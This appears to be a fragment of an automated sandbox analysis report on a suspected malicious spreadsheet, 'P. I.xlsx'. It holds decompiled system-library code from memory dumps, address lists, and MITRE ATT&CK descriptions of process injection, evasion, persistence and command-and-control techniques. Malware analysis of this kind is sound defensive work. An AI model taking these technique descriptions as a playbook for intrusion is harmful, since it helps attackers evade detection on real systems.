0x00905378
0x0090537c
0x00942396
0x00942396
0x00942397
0x0094239c
0x009423a2
0x009423a3
0x009423a6
0x009423ab
0x009423ad
0x00000000
0x009423b3
0x009423b3
0x009423b4
0x009423b9
0x009423ba
0x009423ba
0x009423bc
0x009423bf
0x00000000
0x00000000
0x00939153
0x00939158
0x0093915a
0x0093915e
0x00939160
0x00000000
0x00939166
0x00939166
0x00939171
0x00939176
0x00939176
0x00000000
0x00939160
0x009423c6
0x009423cb
0x009423ce
0x009423d7
0x009423d7
0x009423ad
0x00942390
0x00942373
0x0094233f
0x0094233f
0x00000000
0x0094233f
0x00942291
0x00942291
0x00942293
0x00942295
0x0094229a
0x009422a1
0x009422a3
0x009422a7
0x009422a9
0x00000000
0x00000000
0x009422ab
0x009422ad
0x009422af
0x00000000
0x00000000
0x00000000
0x009422af
0x009422b1
0x009422b4
0x009422b4
0x009422b6
0x00000000
0x00000000
0x00000000
0x00000000
0x009422b6
0x0094228f
0x00000000
0x0094226d
0x009053cb
0x009053ce
0x009053d0
0x009053d4
0x009053d6
0x00000000
0x009053d8
0x009053e3
0x009053ea
0x009053ea
0x009053d6
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009422F4

Strings

RTL: Resource at %p, xrefs: 0094230B
RTL: Re-Waiting, xrefs: 00942328
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 009422FC

Memory Dump Source

Source File: 00000007.00000002.2350384148.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.2350379268.00000000008C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350497834.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350505200.00000000009C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350510437.00000000009C4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350515602.00000000009C7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350520159.00000000009D0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350573478.0000000000A30000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-871070163
Opcode ID: b91340d17bf77faace0eef8e4eaa658ae49916064c143a4ddc1e9862bec382eb
Instruction ID: 981150c3536c3a050b69dd4708f98fb73769ec028dfe72511bbc16febd22fefc
Opcode Fuzzy Hash: b91340d17bf77faace0eef8e4eaa658ae49916064c143a4ddc1e9862bec382eb
Instruction Fuzzy Hash: B8512671600711ABEB149F28CC81FA773ACFF94760F114229FD18DB281EAA5ED418BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0090EC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E0090EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E008FDA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0x9c793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E008E16C0(_t39);
				} else {
					_t40 = E008DF9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E00923915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E008E01A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0x9c793c; // 0x0
								_push(_t85);
								_t44 = E008E1F28(_t71);
							} else {
								_t44 = E008DF8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E00923915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E00962306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E0090EC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E00924FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E00933F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E00933F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0x9c20c0;
								if(_t85 != 0x9c20c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E0096217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E00933F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

0x0090ec56
0x0090ec56
0x0090ec56
0x0090ec5c
0x0090ec64
0x009423e6
0x009423eb
0x009423eb
0x0090ec6a
0x0090ec6c
0x0090ec6f
0x009423f3
0x009423f8
0x009423fa
0x009423fc
0x0090ec75
0x0090ec76
0x0090ec76
0x0090ec7b
0x0090ec7c
0x0090ec7e
0x00942406
0x00942407
0x0094240c
0x0094240d
0x0094240d
0x0094240d
0x00942414
0x00942417
0x0094241e
0x00942435
0x00942438
0x0094243c
0x0094243f
0x00942442
0x00942443
0x00942446
0x00942449
0x00942453
0x00942455
0x0094245b
0x0094245b
0x0090eb99
0x0090eb99
0x0090eb9c
0x0090eb9d
0x0090eb9f
0x0090eba2
0x00942465
0x0094246b
0x0094246d
0x0090eba8
0x0090eba9
0x0090eba9
0x0090ebae
0x0090ebb3
0x0090ebb9
0x0090ebbb
0x00942513
0x00942514
0x00942519
0x0094251b
0x0090ec2a
0x0090ec2d
0x0090ec33
0x0090ec36
0x0090ec3a
0x0090ec3e
0x0090ec40
0x0090ec47
0x0090ec47
0x0090ec40
0x008e22c6
0x0090ebc1
0x0090ebc1
0x0090ebc5
0x0090ec9a
0x0090ec9a
0x0090ebd6
0x0090ebd6
0x00000000
0x0090ebbb
0x00942477
0x0094247c
0x00942486
0x0094248b
0x00942496
0x0094249b
0x0094249d
0x009424a0
0x009424a3
0x009424aa
0x009424aa
0x009424a5
0x009424a5
0x009424a5
0x009424ac
0x009424af
0x009424b0
0x009424b3
0x009424b9
0x009424ba
0x009424bb
0x009424c6
0x009424cb
0x009424cd
0x009424d0
0x009424d1
0x009424d4
0x009424d6
0x009424d9
0x009424d9
0x009424dc
0x009424df
0x009424e1
0x009424e7
0x009424e9
0x009424ec
0x009424ef
0x009424f2
0x009424f2
0x009424ef
0x009424e7
0x009424fa
0x009424ff
0x00942501
0x00942503
0x00942506
0x0094250b
0x0090eb8c
0x0090eb93
0x00000000
0x00000000
0x0090eb93
0x00000000
0x0090eb99
0x0090ec85
0x0090ec85
0x0090ec85
0x00000000

Strings

RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 009424BD
RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0094248D
RTL: Re-Waiting, xrefs: 009424FA

Memory Dump Source

Source File: 00000007.00000002.2350384148.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.2350379268.00000000008C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350497834.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350505200.00000000009C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350510437.00000000009C4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350515602.00000000009C7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350520159.00000000009D0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350573478.0000000000A30000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
API String ID: 0-3177188983
Opcode ID: 437f2f62e3698289a329e32d2d746f5a88988d9b064090e756940e6b77b82383
Instruction ID: 79d3f361d88bd54194509c2bb0874614fe463adb0ee82fcb9406b4e0bbb3ffdb
Opcode Fuzzy Hash: 437f2f62e3698289a329e32d2d746f5a88988d9b064090e756940e6b77b82383
Instruction Fuzzy Hash: 47410770A00204AFDB20DFA9DC89F6A77B9FF85720F208A15F555DB2D1D738E9418B61

Uniqueness

Uniqueness Score: -1.00%

Function 0091FCC9, Relevance: 6.3, APIs: 4, Instructions: 257
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0091FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E0091EE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E0091EE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E0091685D(_t167, 4) == 0) {
								if(E0091685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E0091685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E0091685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E008F8980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E008EDFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E0091EE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E0091EE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

0x0091fcd1
0x0091fcd6
0x0091fcd9
0x0091fcdc
0x0091fcdf
0x0091fce2
0x0091fce5
0x0091fce8
0x0091fceb
0x0091fced
0x0091fced
0x0091fcf3
0x00000000
0x00000000
0x0091fcfc
0x0091fcfe
0x0091fdc1
0x0094ecbd
0x00000000
0x0094eccc
0x0094eccc
0x0094ecd2
0x00000000
0x00000000
0x0094ecdf
0x0094ece0
0x0094ece4
0x0094eceb
0x0094ecee
0x0094eca8
0x0094eca8
0x0094ecaa
0x0091fd76
0x0091fd79
0x0091fdb4
0x0091fdb5
0x0091fdb6
0x00000000
0x0091fdb6
0x0091fd7e
0x0094ecfc
0x0091fe2f
0x00000000
0x0091fe2f
0x0094ed08
0x0094ed0f
0x0094ed17
0x0094ed1b
0x00000000
0x0094ed1b
0x0091fd88
0x00000000
0x00000000
0x0091fd94
0x0091fd99
0x0091fda1
0x00000000
0x00000000
0x0091fdb0
0x00000000
0x0091fdb0
0x0094ecbd
0x0091fdc7
0x0091fdcb
0x00000000
0x0091fdd7
0x0091fde3
0x0091fe06
0x00931fe7
0x00000000
0x00000000
0x00931fef
0x00931ff0
0x00931ff4
0x00931ff7
0x00931ffa
0x00931ffd
0x00932000
0x00000000
0x00000000
0x0094ecf1
0x00000000
0x0094ecf1
0x00000000
0x0091fe06
0x0091fde8
0x0091fdec
0x0091fdef
0x0091fdf2
0x00000000
0x0091fdf2
0x0091fdcb
0x0091fd04
0x0091fd05
0x0094ec67
0x00000000
0x00000000
0x0094ec6f
0x00000000
0x0094ec6f
0x0091fd13
0x0091fd3c
0x0091fd40
0x0094ec75
0x0094ec7a
0x00000000
0x0094ec8a
0x0094ec8a
0x0094ec90
0x0094ecb2
0x0091fd73
0x0091fd73
0x00000000
0x0091fd73
0x0094ec95
0x00000000
0x00000000
0x0094eca1
0x0094eca4
0x0094eca5
0x00000000
0x0094eca5
0x0094ec7a
0x0091fd4a
0x00000000
0x0091fd6e
0x0091fd6e
0x0091fd71
0x00000000
0x0091fd71
0x0091fd4a
0x0091fd21
0x0092a3a1
0x00000000
0x0092a3a1
0x0091fd36
0x0093200b
0x00932012
0x00000000
0x00000000
0x00932018
0x00000000
0x00932018
0x00000000
0x0091fd36
0x0091fe0f
0x0091fe16
0x0092a3ad
0x00000000
0x00000000
0x0092a3b3
0x0092a3b3
0x0091fe1f
0x0094ed25
0x0094ed86
0x00000000
0x00000000
0x0094ed91
0x0094ed95
0x0094ed95
0x0094ed9a
0x0094edad
0x0094edb3
0x0094edba
0x0094edc4
0x0094edc9
0x00000000
0x0094edcc
0x0094ed2a
0x0094ed55
0x00000000
0x00000000
0x0094ed61
0x0094ed66
0x0094ed6e
0x00000000
0x00000000
0x0094ed7d
0x00000000
0x0094ed7d
0x0094ed30
0x00000000
0x00000000
0x0094ed3c
0x0094ed43
0x0094ed4b
0x00000000
0x00000000
0x00000000
0x00000000

APIs

__fassign.LIBCMT ref: 0091FD94

Memory Dump Source

Source File: 00000007.00000002.2350384148.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.2350379268.00000000008C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350497834.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350505200.00000000009C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350510437.00000000009C4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350515602.00000000009C7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350520159.00000000009D0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350573478.0000000000A30000.00000040.00000001.sdmp Download File

Similarity

API ID: __fassign
String ID:
API String ID: 3965848254-0
Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction ID: 4e83bbbba3a2dd59214ac9b67b663ebc1daac38c6867af60d6e2911b4481eb6c
Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction Fuzzy Hash: 2C918D36F0020EEBDF24CF98C855AEEB7B8FF55305F20847AD451A61A2E7304A91CB91

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report P. I.xlsx

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Exploits:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

